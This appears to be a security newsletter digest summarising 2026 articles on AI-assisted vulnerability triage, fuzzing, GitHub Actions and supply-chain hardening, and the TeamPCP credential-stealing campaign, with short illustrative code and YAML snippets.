The article describes how Synthesia built an AI-driven vulnerability management system to handle overwhelming volumes of security findings from SAST and SCA tools. The key approach is aggressive automation: filtering noise (stale code, low-risk issues, false positives) so only meaningful findings become tickets. AI agents then validate vulnerabilities using consensus-based analysis and automatically generate fixes as pull requests, shifting developers from writing fixes to reviewing them. This system drastically reduced backlog and manual effort, with only a small fraction of issues requiring human review, allowing security teams to focus on high-impact risks while accelerating remediation. https://www.synthesia.io/post/scaling-vulnerability-management-with-ai-what-actually-worked
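
Consensus-based validation can be sketched as a simple supermajority vote over independent model judgements. This is a hypothetical illustration of the pattern, not Synthesia's published implementation:

```python
# Illustrative consensus vote: a finding is accepted only when a
# supermajority of independent model runs agree on the same verdict.
from collections import Counter

def consensus_verdict(judgements, quorum=0.66):
    """Return the majority label if it clears the quorum,
    otherwise escalate the finding to a human analyst."""
    votes = Counter(judgements)
    label, count = votes.most_common(1)[0]
    if count / len(judgements) >= quorum:
        return label
    return "needs-human-review"  # no consensus -> human in the loop
```

The escalation path is the important design choice: disagreement between runs is treated as a signal of uncertainty rather than resolved arbitrarily, which is how the described system keeps human review focused on the ambiguous minority of findings.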

VulnVibes: AI Agent for Context-Aware Vulnerability Triage

The article introduces VulnVibes, an experimental AI security agent designed to analyze GitHub pull requests with full architectural context rather than isolated code scanning. Unlike traditional SAST tools, it reasons across multiple repositories, infrastructure configs, and service interactions to determine whether a vulnerability is actually exploitable. It works in two stages: fast threat modeling to filter relevant changes, followed by deep investigation that traces attack paths across services, configs, and environments. The system produces structured verdicts with reasoning, confidence, and risk levels. The key insight is that real security issues often emerge from system-level interactions, not single files, and effective AI tooling must replicate how human engineers analyze entire systems, not just code snippets. https://www.anshuman.ai/posts/vulnvibes-intro
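
One plausible shape for the structured verdicts described above, sketched as a dataclass (hypothetical; the post does not publish VulnVibes' actual schema):

```python
# Hypothetical verdict record combining the fields the article mentions:
# a reasoned conclusion, a confidence score, and a risk level.
from dataclasses import dataclass

@dataclass
class Verdict:
    pr_url: str
    exploitable: bool
    risk: str          # e.g. "low" | "medium" | "high"
    confidence: float  # 0.0 .. 1.0
    reasoning: str     # attack-path trace across services and configs

v = Verdict(
    pr_url="https://github.com/org/repo/pull/42",
    exploitable=True,
    risk="high",
    confidence=0.8,
    reasoning="user-controlled id reaches internal admin API without an authz check",
)
```

Emitting a structured record instead of free-form text is what makes such an agent's output filterable and auditable downstream.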

Why Mutational Grammar Fuzzing Can Mislead Bug Discovery

The article explains mutational grammar fuzzing, a technique that generates structured test inputs by mutating data while preserving grammar rules, making it effective for testing complex parsers and languages.  However, it argues the approach has important flaws. Coverage-guided fuzzing can prioritize inputs that increase code coverage without actually finding more bugs, leading to misleading results. Grammar constraints can also limit exploration, preventing the fuzzer from reaching unexpected or invalid states where vulnerabilities often exist. The author proposes simple mitigation strategies, emphasizing that fuzzing effectiveness depends less on structure-awareness alone and more on balancing coverage, mutation diversity, and exploration beyond strict grammar boundaries.  https://projectzero.google/2026/03/mutational-grammar-fuzzing.html
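
The tension between grammar-preserving mutation and exploring invalid states can be shown with a toy mutator. This is a deliberately simplified sketch (not the article's code): most mutations respect a tiny arithmetic grammar, but a small fraction intentionally break it so states outside the grammar are still reachable.

```python
# Toy mutational fuzzer over expressions like "1+2": grammar-preserving
# digit swaps most of the time, with an occasional grammar-violating
# insertion to escape the constraints of strict structure-awareness.
import random

DIGITS = "0123456789"

def mutate(expr, rng, break_grammar_rate=0.1):
    i = rng.randrange(len(expr))
    if rng.random() < break_grammar_rate:
        # escape the grammar: inject a byte no production allows
        return expr[:i] + rng.choice("!@\x00") + expr[i:]
    if expr[i] in DIGITS:
        # grammar-preserving: swap one digit for another
        return expr[:i] + rng.choice(DIGITS) + expr[i + 1:]
    return expr  # operator positions left untouched in this toy example
```

Setting `break_grammar_rate` to zero gives a purely structure-aware fuzzer that can never reach the invalid-input states where parser bugs often hide, which is exactly the limitation the article describes.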

GitHub Actions 2026: Secure-by-Default CI/CD

The roadmap outlines GitHub’s plan to strengthen GitHub Actions security by focusing on three main areas: secure defaults, stronger policy controls, and improved CI/CD observability. It aims to reduce common attack paths such as untrusted code execution, over-permissioned credentials, and lack of visibility in workflows.  Key initiatives include enforcing safer configurations by default, enabling organizations to define and enforce security policies across workflows, and increasing transparency into pipeline behavior to detect malicious activity. The broader goal is to harden the entire software supply chain, especially as attackers increasingly target CI/CD systems themselves. https://github.blog/news-insights/product-news/whats-coming-to-our-github-actions-2026-security-roadmap
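
In practice, the "over-permissioned credentials" problem is addressed by scoping the workflow token explicitly. A minimal least-privilege workflow sketch using standard GitHub Actions syntax (illustrative; your organization's enforced defaults may differ):

```yaml
# Least-privilege GITHUB_TOKEN: grant read-only access unless a job
# demonstrably needs more.
name: build
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
```

Declaring `permissions` at the top level downgrades the automatic token for every job, which is the kind of safer configuration the roadmap aims to make the default.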

End-to-End Approach to Securing the Open Source Supply Chain

The article outlines how GitHub is building a comprehensive, end-to-end approach to securing the open source supply chain across the entire development lifecycle. It emphasizes visibility into dependencies (via dependency graphs and SBOM-like capabilities), automated vulnerability detection and remediation (e.g., Dependabot), and stronger integrity guarantees through features like artifact attestations and signed builds.  A key theme is integrating security directly into developer workflows (“shift left”) so issues are detected early without slowing delivery. The approach also focuses on provenance, ensuring code and artifacts can be trusted, and on ecosystem-wide collaboration to reduce systemic risk in open source. Overall, GitHub promotes a layered strategy combining automation, verification, and developer-first tooling to address modern supply chain attacks. https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-across-github/

The False Security of SHA Pinning in GitHub Actions

The article argues that pinning dependencies to commit SHAs in GitHub Actions—commonly considered a best practice—creates a false sense of security. While SHAs are immutable, GitHub does not verify that a referenced SHA actually belongs to the intended repository. This allows attackers to substitute malicious code from a fork while keeping the same repo name, making changes hard to detect in reviews. The core issue is lack of provenance, not immutability, showing that SHA pinning alone is insufficient without validation and stronger supply chain controls. https://www.vaines.org/posts/2026-03-24-the-comforting-lie-of-sha-pinning
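
For readers unfamiliar with the practice, this is what SHA pinning looks like in a workflow (`<full-commit-sha>` is a placeholder, not a real pin):

```yaml
steps:
  # The SHA is immutable, but GitHub resolves it across the entire fork
  # network: a commit pushed to any fork of actions/checkout can be
  # referenced through the upstream name, so reviewers who see "checkout"
  # have no guarantee the commit actually lives in that repository.
  - uses: actions/checkout@<full-commit-sha>  # version comment, unverified
```

This is why the article frames the gap as one of provenance: the pin fixes *what* runs, but not *whose* code it is.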

TeamPCP Campaign: Weaponizing the Software Supply Chain

The article describes TeamPCP, a highly coordinated March 2026 supply chain campaign that began with a single compromised credential and rapidly spread across multiple developer ecosystems. Attackers injected credential-stealing malware into widely trusted tools like Trivy, KICS, LiteLLM, and other packages used in CI/CD pipelines. The malware harvested cloud tokens, SSH keys, and secrets directly from automated workflows, then reused stolen credentials to expand the attack across GitHub, PyPI, npm, and container environments. The campaign stands out for its speed, automation, and focus on security tools themselves, turning defensive infrastructure into an attack vector. It demonstrates how trust relationships in modern software pipelines can enable cascading, large-scale compromises, highlighting the need for stricter credential management, dependency controls, and CI/CD hardening. https://opensourcemalware.com/blog/teampcp-supply-chain-campaign

AI-Powered Framework for Scalable Vulnerability Scanning

The article explains how GitHub Security Lab’s open source AI-powered framework uses an agent-based system (Taskflow Agent) to automate vulnerability discovery in codebases. It combines LLM reasoning with structured “taskflows” (step-by-step workflows) to systematically audit software for issues like auth bypasses, IDORs, and token leaks. The framework integrates with tools like CodeQL and external services to handle deterministic tasks, while reserving AI for deeper analysis. It has proven effective at finding high-impact bugs in open source projects, demonstrating a scalable, collaborative approach to modern security research.  https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework

Open Source Security Trends: Rising Malware and Faster Exploits

The report analyzes a year of open-source security data across CVEs, advisories, and malware, highlighting a shift toward more malicious packages and faster exploitation cycles. Malware in package ecosystems remains a major and growing threat, with thousands of malicious advisories published annually. Attackers increasingly target trusted distribution channels and developer workflows. At the same time, vulnerability disclosure is accelerating, with exploits often appearing shortly after advisories. The findings emphasize that modern supply chain security must go beyond CVEs, incorporating malware detection, faster response, and continuous dependency monitoring.  https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware

AI Security Radar: Detecting Vulnerabilities Introduced by AI-Generated Code

The Vibe Security Radar project is a research tool that identifies security vulnerabilities associated with AI-generated code. It analyzes vulnerability databases such as CVE and NVD, traces fixes through commit history, and looks for signs that code was produced with AI assistance. It then uses a language model to assess whether the vulnerability likely originated from AI-generated code. The findings show that AI-assisted development can introduce critical security risks, emphasizing the need for better detection and mitigation practices. https://github.com/HQ1995/vibe-security-radar